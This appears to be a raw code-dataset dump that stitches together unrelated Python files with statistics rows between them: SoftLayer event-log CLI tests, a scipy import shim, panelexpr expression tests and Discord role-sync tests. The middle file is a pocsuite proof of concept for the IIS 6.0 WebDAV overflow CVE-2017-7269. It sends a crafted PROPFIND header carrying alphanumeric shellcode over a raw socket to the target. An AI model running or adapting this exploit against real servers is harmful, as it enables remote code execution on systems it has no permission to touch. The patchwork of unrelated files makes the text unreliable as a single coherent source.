'event': 'Security Group Rule Added',
'object': 'test.softlayer.com',
'username': 'SL12345-test',
'type': 'CCI',
'metadata': json.dumps(json.loads(
'{"networkComponentId":"100",'
'"networkInterfaceType":"public",'
'"requestId":"53d0b91d392864e062f4958",'
'"rules":[{"direction":"ingress",'
'"ethertype":"IPv4",'
'"portRangeMax":2001,"portRangeMin":2000,"protocol":"tcp",'
'"remoteGroupId":null,"remoteIp":null,"ruleId":"100"}],"securityGroupId":"200",'
'"securityGroupName":"test_SG"}'
),
indent=4,
sort_keys=True
)
},
{
'date': '2017-10-18T09:40:32.238869-05:00',
'event': 'Security Group Added',
'object': 'test.softlayer.com',
'username': 'SL12345-test',
'type': 'CCI',
'metadata': json.dumps(json.loads(
'{"networkComponentId":"100",'
'"networkInterfaceType":"public",'
'"requestId":"96c9b47b9e102d2e1d81fba",'
'"securityGroupId":"200",'
'"securityGroupName":"test_SG"}'
),
indent=4,
sort_keys=True
)
},
{
'date': '2017-10-18T10:42:13.089536-05:00',
'event': 'Security Group Rule(s) Removed',
'object': 'test_SG',
'username': 'SL12345-test',
'type': 'Security Group',
'metadata': json.dumps(json.loads(
'{"requestId":"2abda7ca97e5a1444cae0b9",'
'"rules":[{"direction":"ingress",'
'"ethertype":"IPv4",'
'"portRangeMax":2001,"portRangeMin":2000,"protocol":"tcp",'
'"remoteGroupId":null,"remoteIp":null,"ruleId":"800"}]}'
),
indent=4,
sort_keys=True
)
},
{
'date': '2017-10-18T10:42:11.679736-05:00',
'event': 'Network Component Removed from Security Group',
'object': 'test_SG',
'username': 'SL12345-test',
'type': 'Security Group',
'metadata': json.dumps(json.loads(
'{"fullyQualifiedDomainName":"test.softlayer.com",'
'"networkComponentId":"100",'
'"networkInterfaceType":"public",'
'"requestId":"6b9a87a9ab8ac9a22e87a00"}'
),
indent=4,
sort_keys=True
)
},
{
'date': '2017-10-18T10:41:49.802498-05:00',
'event': 'Security Group Rule(s) Added',
'object': 'test_SG',
'username': 'SL12345-test',
'type': 'Security Group',
'metadata': json.dumps(json.loads(
'{"requestId":"0a293c1c3e59e4471da6495",'
'"rules":[{"direction":"ingress",'
'"ethertype":"IPv4",'
'"portRangeMax":2001,"portRangeMin":2000,"protocol":"tcp",'
'"remoteGroupId":null,"remoteIp":null,"ruleId":"800"}]}'
),
indent=4,
sort_keys=True
)
},
{
'date': '2017-10-18T10:41:42.176328-05:00',
'event': 'Network Component Added to Security Group',
'object': 'test_SG',
'username': 'SL12345-test',
'type': 'Security Group',
'metadata': json.dumps(json.loads(
'{"fullyQualifiedDomainName":"test.softlayer.com",'
'"networkComponentId":"100",'
'"networkInterfaceType":"public",'
'"requestId":"4709e02ad42c83f80345904"}'
),
indent=4,
sort_keys=True
)
}
]
for log in expected:
table_fix.add_row([log['event'], log['object'], log['type'], log['date'],
log['username'], log['metadata'].strip("{}\n\t")])
expected_output = formatting.format_output(table_fix) + '\n'
result = self.run_command(args=['event-log', 'get', '--metadata'], fmt='table')
self.assert_no_fail(result)
self.assertEqual(expected_output, result.output)
def test_get_event_log_empty(self):
mock = self.set_mock('SoftLayer_Event_Log', 'getAllObjects')
mock.return_value = None
result = self.run_command(['event-log', 'get'])
self.assertEqual(mock.call_count, 1)
self.assert_no_fail(result)
self.assertEqual('"None available."\n', result.output)
def test_get_event_log_types(self):
expected = [
{
"types": {"value": "Account"}
},
{
"types": {"value": "CDN"}
},
{
"types": {"value": "User"}
},
{
"types": {"value": "Bare Metal Instance"}
},
{
"types": {"value": "API Authentication"}
},
{
"types": {"value": "Server"}
},
{
"types": {"value": "CCI"}
},
{
"types": {"value": "Image"}
},
{
"types": {"value": "Bluemix LB"}
},
{
"types": {"value": "Facility"}
},
{
"types": {"value": "Cloud Object Storage"}
},
{
"types": {"value": "Security Group"}
}
]
result = self.run_command(['event-log', 'types'])
self.assert_no_fail(result)
self.assertEqual(expected, json.loads(result.output))
| 38.863271
| 104
| 0.416736
| 1,080
| 14,496
| 5.52037
| 0.14537
| 0.067595
| 0.035223
| 0.06944
| 0.85743
| 0.854411
| 0.849715
| 0.827742
| 0.809124
| 0.809124
| 0
| 0.108677
| 0.433154
| 14,496
| 372
| 105
| 38.967742
| 0.616892
| 0.008623
| 0
| 0.663793
| 0
| 0
| 0.377047
| 0.200544
| 0
| 0
| 0
| 0
| 0.031609
| 1
| 0.014368
| false
| 0
| 0.008621
| 0
| 0.025862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c53385513c4e7f055cd5a040c28216148fd90682
| 235
|
py
|
Python
|
scipy/integrate/_quadpack_clr.py
|
jasonmccampbell/scipy-refactor
|
52708e04bca51e7043248d56383780b1e51e0d8f
|
[
"BSD-3-Clause"
] | 8
|
2015-10-07T00:37:32.000Z
|
2022-01-21T17:02:33.000Z
|
scipy/integrate/_quadpack_clr.py
|
enthought/scipy-refactor
|
52708e04bca51e7043248d56383780b1e51e0d8f
|
[
"BSD-3-Clause"
] | null | null | null |
scipy/integrate/_quadpack_clr.py
|
enthought/scipy-refactor
|
52708e04bca51e7043248d56383780b1e51e0d8f
|
[
"BSD-3-Clause"
] | 8
|
2015-05-09T14:23:57.000Z
|
2018-11-15T05:56:00.000Z
|
import sys
if sys.platform == 'cli':
import clr
clr.AddReference('integrate')
from scipy__integrate___quadpack import _qagie, _qagpe, _qawoe, _qawfe, _qawce, _qagse, _qawse
from scipy__integrate___quadpack import *
| 21.363636
| 98
| 0.740426
| 28
| 235
| 5.607143
| 0.642857
| 0.11465
| 0.229299
| 0.33121
| 0.407643
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.182979
| 235
| 10
| 99
| 23.5
| 0.817708
| 0
| 0
| 0
| 0
| 0
| 0.051724
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c54a06ac7bb9e56ee7f9831a6d2867dabbdf8584
| 5,963
|
py
|
Python
|
test/basic_test.py
|
actcwlf/panelexpr
|
a13a01981daab965b314b328f346b641634c7de1
|
[
"MIT"
] | null | null | null |
test/basic_test.py
|
actcwlf/panelexpr
|
a13a01981daab965b314b328f346b641634c7de1
|
[
"MIT"
] | null | null | null |
test/basic_test.py
|
actcwlf/panelexpr
|
a13a01981daab965b314b328f346b641634c7de1
|
[
"MIT"
] | null | null | null |
import unittest
from panelexpr._utils.utils import *
from panelexpr import eval as t_eval
THRESHOLD = 1e-6
class BasicTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.data = pd.read_csv("../data/sample_zh_2.csv")
def test_add(self):
s1 = t_eval("Open + Close", data=self.data)
s2 = self.data["Open"] + self.data["Close"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_sub(self):
s1 = t_eval("Open - Close", data=self.data)
s2 = self.data["Open"] - self.data["Close"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_mul(self):
s1 = t_eval("Open * Close", data=self.data)
s2 = self.data["Open"] * self.data["Close"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
#
def test_div(self):
s1 = t_eval("Open / Close", data=self.data)
s2 = self.data["Open"] / self.data["Close"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_complex(self):
s1 = t_eval("Open / (Close - High)", data=self.data)
s2 = self.data["Open"] / (self.data["Close"] - self.data["High"])
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rolling_mean(self):
s1 = t_eval("mmean(Open, 2, group_by='windcode')", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(2).mean()).reset_index()
s2 = df["Open"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rolling_mean_global_params(self):
s1 = t_eval("ma(Open, 2)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(2).mean()).reset_index()
s2 = df["Open"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rolling_max(self):
s1 = t_eval("mmax(Open, 2)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(2).max()).reset_index()
s2 = df["Open"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rolling_min(self):
s1 = t_eval("mmin(Open, 2)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(2).min()).reset_index()
s2 = df["Open"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rolling_mean_overflow(self):
s1 = t_eval("mmean(Open, 10)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(10).mean()).reset_index()
s2 = df["Open"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD or matching)
def test_rolling_std(self):
s1 = t_eval("mstd(Open, 2)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(2).std()).reset_index()
s2 = df["Open"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rolling_cov(self):
s1 = t_eval("mcov(Open, Close, 2)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(2).cov(df["Close"].rolling(2))).reset_index()
s2 = df[0]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rolling_corr(self):
s1 = t_eval("mcorr(Open, Close, 2)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda df: df["Open"].rolling(2).corr(df["Close"].rolling(2))).reset_index()
s2 = df[0]
v = mean_absolute_deviation(s1, s2)
self.assertTrue(v < THRESHOLD)
def test_ewma(self):
s1 = t_eval("ewm(Open, 2)", group_tag="windcode", data=self.data)
df = self.data.groupby("windcode").apply(lambda d: d["Open"].ewm(span=2, min_periods=1).mean()).reset_index()
s2 = df["Open"]
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
def test_rank(self):
def fun(df):
df["or"] = df["Open"].rank()
return df
data = self.data.sort_values(["Date", "windcode"])
data["s1"] = s1 = t_eval("rank(Open)", time_tag="Date", data=data)
data["s2"] = s2 = data.groupby("Date").apply(fun)["or"]
# print(data[["Date", "windcode", "Open", "s1", "s2"]])
# print(data)
v = mean_absolute_deviation(s1, s2)
matching = nan_matching(s1, s2)
self.assertTrue(v < THRESHOLD)
self.assertTrue(matching)
class NanTest(BasicTest):
@classmethod
def setUpClass(cls):
cls.data = pd.read_csv("../data/sample_zh_3.csv")
if __name__ == '__main__':
unittest.main()
| 37.980892
| 125
| 0.608754
| 799
| 5,963
| 4.390488
| 0.115144
| 0.079818
| 0.029932
| 0.094071
| 0.823831
| 0.823831
| 0.799886
| 0.799886
| 0.799886
| 0.799886
| 0
| 0.026553
| 0.235787
| 5,963
| 156
| 126
| 38.224359
| 0.743252
| 0.010901
| 0
| 0.550388
| 0
| 0
| 0.097913
| 0.007806
| 0
| 0
| 0
| 0
| 0.217054
| 1
| 0.139535
| false
| 0
| 0.023256
| 0
| 0.186047
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c56142abe52fdfe53189d64b9b52592a2cbe1b07
| 7,809
|
py
|
Python
|
vul/45-iis6_RCE_CVE-2017-7269.py
|
zx273983653/vulscan
|
787397e267c4e6469522ee0abe55b3e98f968d4a
|
[
"MIT"
] | 582
|
2019-02-23T09:23:33.000Z
|
2022-03-31T04:42:08.000Z
|
vul/45-iis6_RCE_CVE-2017-7269.py
|
git-wsf/vulscan
|
112f8d6104daecfaaad579f73029a26d56aaa9b3
|
[
"MIT"
] | 6
|
2019-03-20T10:37:48.000Z
|
2020-03-10T06:20:07.000Z
|
vul/45-iis6_RCE_CVE-2017-7269.py
|
git-wsf/vulscan
|
112f8d6104daecfaaad579f73029a26d56aaa9b3
|
[
"MIT"
] | 183
|
2019-02-23T06:00:18.000Z
|
2022-03-20T02:17:57.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
#命令行
from pocsuite import pocsuite_cli
#验证模块
from pocsuite import pocsuite_verify
#攻击模块
from pocsuite import pocsuite_attack
#控制台模式
from pocsuite import pocsuite_console
#requests
from pocsuite.api.request import req
#register
from pocsuite.api.poc import register
#report
from pocsuite.api.poc import Output, POCBase
#url转换host
from pocsuite.lib.utils.funs import url2ip
#基础基类
#CVE-2017-7269 IIS webdav RCE
class iis_RCE_POC(POCBase):
vulID = '45' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
version = '1' #默认为1
vulDate = '2018-08-16' #漏洞公开的时间,不知道就写今天
author = 'arr0w1' # PoC作者的大名
createDate ='2018-08-16'# 编写 PoC 的日期
updateDate = '2018-08-16'# PoC 更新的时间,默认和编写时间一样
references = ['https://nvd.nist.gov/vuln/detail/CVE-2017-7269']# 漏洞地址来源,0day不用写
name = 'CVE-2017-7269'# PoC 名称
appPowerLink = 'https://www.iis.net/'# 漏洞厂商主页地址
appName = 'IIS'# 漏洞应用名称
appVersion = '6.0'# 漏洞影响版本
vulType = 'cmd-exec'#漏洞类型,类型参考见 漏洞类型规范表
desc = '''
IIS 6.0 webdav RCE,CVE-2017-7269
''' # 漏洞简要描述
samples = []# 测试样列,就是用 PoC 测试成功的网站
install_requires = ['socket',['re']]# PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"严重" #严重,高危,中危,低危
#指纹方法
def _fingerprint(self):
pass
def _verify(self):
# ip = self.url.split(':')[1].replace('/', '')
#from api.utils import url2ip
#--------------找url中 冒号后的web端口
import re
_port = re.findall(':(\d+)\s*', self.url)
if len(_port) != 0:
_port = url2ip(self.url)[1]
else:
_port = 80
#-------------
ip = url2ip(self.url)
import socket
result={}
pay = 'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay += 'If: <http://localhost/aaaaaaa'
pay += '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay += '>'
pay += ' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
pay += '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397N30WRJLMSSI7LNR72JPTKOXPZKQH0CR615NMNRP0NQNWNMOGP206NYKPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJOBNVO0LMLJLMKZ0HOXOY0TO0OS260ENMNRP0NQOGNMOGOB06OIMP2345RCS3RET3D3M0KLK8SRM0KPM0C0SYK5NQWP2DDK0PNP4KQBLLTKQBMDDKD2MXLOGG0JO6NQKO6LOLQQSLKRNLMP7QXOLMM18G9RJRR2R74KQBLP4K0JOL4K0LN1RXK3PHKQHQ0Q4K29MPM19CTKQ9MH9SOJQ94KNTTKKQJ6P1KOFLY1XOLMKQXGNX9PD5KFM33MKHOKSMO42UJDPXTKB8O4KQIC1V4KLL0K4K0XMLKQXSTKKTTKKQJ0CYQ4O4MTQKQK1QR90Z0QKOYPQOQOQJ4KLRJKTM1MWKOWMCBR2OQZKPPSKOYEKPA'
pay += shellcode
pay += '>\r\n\r\n'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, _port))# ip port
sock.send(pay)
try:
data = sock.recv(80960)
except:
print '连接失败'
pass
print '-'*18+'\n'
print data
print '-'*18+'\n'
sock.close()
if not -1 == data.find('HHIT CVE-2017-7269 Success'):
message = '%s is vulnerable!' %ip + 'CVE-2017-7269 vulnerability!'
print(message)
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = ip
result['VerifyInfo']['Payload'] = pay
return True
else:
print '没有发现关键字.'
return False
return self.save_output(result)
#攻击模块
def _attack(self):
pass
#输出报告
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
#注册类
register(iis_RCE_POC)
| 60.069231
| 2,193
| 0.698425
| 1,358
| 7,809
| 4.000736
| 0.198085
| 0.024296
| 0.018222
| 0.013252
| 0.045831
| 0.034235
| 0.01767
| 0.009939
| 0.009939
| 0
| 0
| 0.207468
| 0.118581
| 7,809
| 130
| 2,194
| 60.069231
| 0.581868
| 0.065437
| 0
| 0.098765
| 0
| 0.037037
| 0.709203
| 0.646589
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0.037037
| 0.123457
| null | null | 0.08642
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c561ba447700d0a67f82634f86fe0d6edd3149c0
| 3,845
|
py
|
Python
|
tests/cogs/sync/test_roles.py
|
Ayplow/bot
|
71a3ac9382851845dcb26609d64299bd69b0f0f5
|
[
"MIT"
] | 1
|
2021-02-16T10:01:34.000Z
|
2021-02-16T10:01:34.000Z
|
tests/cogs/sync/test_roles.py
|
Ayplow/bot
|
71a3ac9382851845dcb26609d64299bd69b0f0f5
|
[
"MIT"
] | null | null | null |
tests/cogs/sync/test_roles.py
|
Ayplow/bot
|
71a3ac9382851845dcb26609d64299bd69b0f0f5
|
[
"MIT"
] | null | null | null |
from bot.cogs.sync.syncers import Role, get_roles_for_sync
def test_get_roles_for_sync_empty_return_for_equal_roles():
api_roles = {Role(id=41, name='name', colour=33, permissions=0x8, position=1)}
guild_roles = {Role(id=41, name='name', colour=33, permissions=0x8, position=1)}
assert get_roles_for_sync(guild_roles, api_roles) == (set(), set(), set())
def test_get_roles_for_sync_returns_roles_to_update_with_non_id_diff():
api_roles = {Role(id=41, name='old name', colour=35, permissions=0x8, position=1)}
guild_roles = {Role(id=41, name='new name', colour=33, permissions=0x8, position=2)}
assert get_roles_for_sync(guild_roles, api_roles) == (
set(),
guild_roles,
set(),
)
def test_get_roles_only_returns_roles_that_require_update():
api_roles = {
Role(id=41, name='old name', colour=33, permissions=0x8, position=1),
Role(id=53, name='other role', colour=55, permissions=0, position=3)
}
guild_roles = {
Role(id=41, name='new name', colour=35, permissions=0x8, position=2),
Role(id=53, name='other role', colour=55, permissions=0, position=3)
}
assert get_roles_for_sync(guild_roles, api_roles) == (
set(),
{Role(id=41, name='new name', colour=35, permissions=0x8, position=2)},
set(),
)
def test_get_roles_returns_new_roles_in_first_tuple_element():
api_roles = {
Role(id=41, name='name', colour=35, permissions=0x8, position=1),
}
guild_roles = {
Role(id=41, name='name', colour=35, permissions=0x8, position=1),
Role(id=53, name='other role', colour=55, permissions=0, position=2)
}
assert get_roles_for_sync(guild_roles, api_roles) == (
{Role(id=53, name='other role', colour=55, permissions=0, position=2)},
set(),
set(),
)
def test_get_roles_returns_roles_to_update_and_new_roles():
api_roles = {
Role(id=41, name='old name', colour=35, permissions=0x8, position=1),
}
guild_roles = {
Role(id=41, name='new name', colour=40, permissions=0x16, position=2),
Role(id=53, name='other role', colour=55, permissions=0, position=3)
}
assert get_roles_for_sync(guild_roles, api_roles) == (
{Role(id=53, name='other role', colour=55, permissions=0, position=3)},
{Role(id=41, name='new name', colour=40, permissions=0x16, position=2)},
set(),
)
def test_get_roles_returns_roles_to_delete():
api_roles = {
Role(id=41, name='name', colour=35, permissions=0x8, position=1),
Role(id=61, name='to delete', colour=99, permissions=0x9, position=2),
}
guild_roles = {
Role(id=41, name='name', colour=35, permissions=0x8, position=1),
}
assert get_roles_for_sync(guild_roles, api_roles) == (
set(),
set(),
{Role(id=61, name='to delete', colour=99, permissions=0x9, position=2)},
)
def test_get_roles_returns_roles_to_delete_update_and_new_roles():
api_roles = {
Role(id=41, name='not changed', colour=35, permissions=0x8, position=1),
Role(id=61, name='to delete', colour=99, permissions=0x9, position=2),
Role(id=71, name='to update', colour=99, permissions=0x9, position=3),
}
guild_roles = {
Role(id=41, name='not changed', colour=35, permissions=0x8, position=1),
Role(id=81, name='to create', colour=99, permissions=0x9, position=4),
Role(id=71, name='updated', colour=101, permissions=0x5, position=3),
}
assert get_roles_for_sync(guild_roles, api_roles) == (
{Role(id=81, name='to create', colour=99, permissions=0x9, position=4)},
{Role(id=71, name='updated', colour=101, permissions=0x5, position=3)},
{Role(id=61, name='to delete', colour=99, permissions=0x9, position=2)},
)
| 36.971154
| 88
| 0.647074
| 557
| 3,845
| 4.258528
| 0.118492
| 0.078415
| 0.078836
| 0.080944
| 0.92032
| 0.903457
| 0.875632
| 0.872681
| 0.810708
| 0.79258
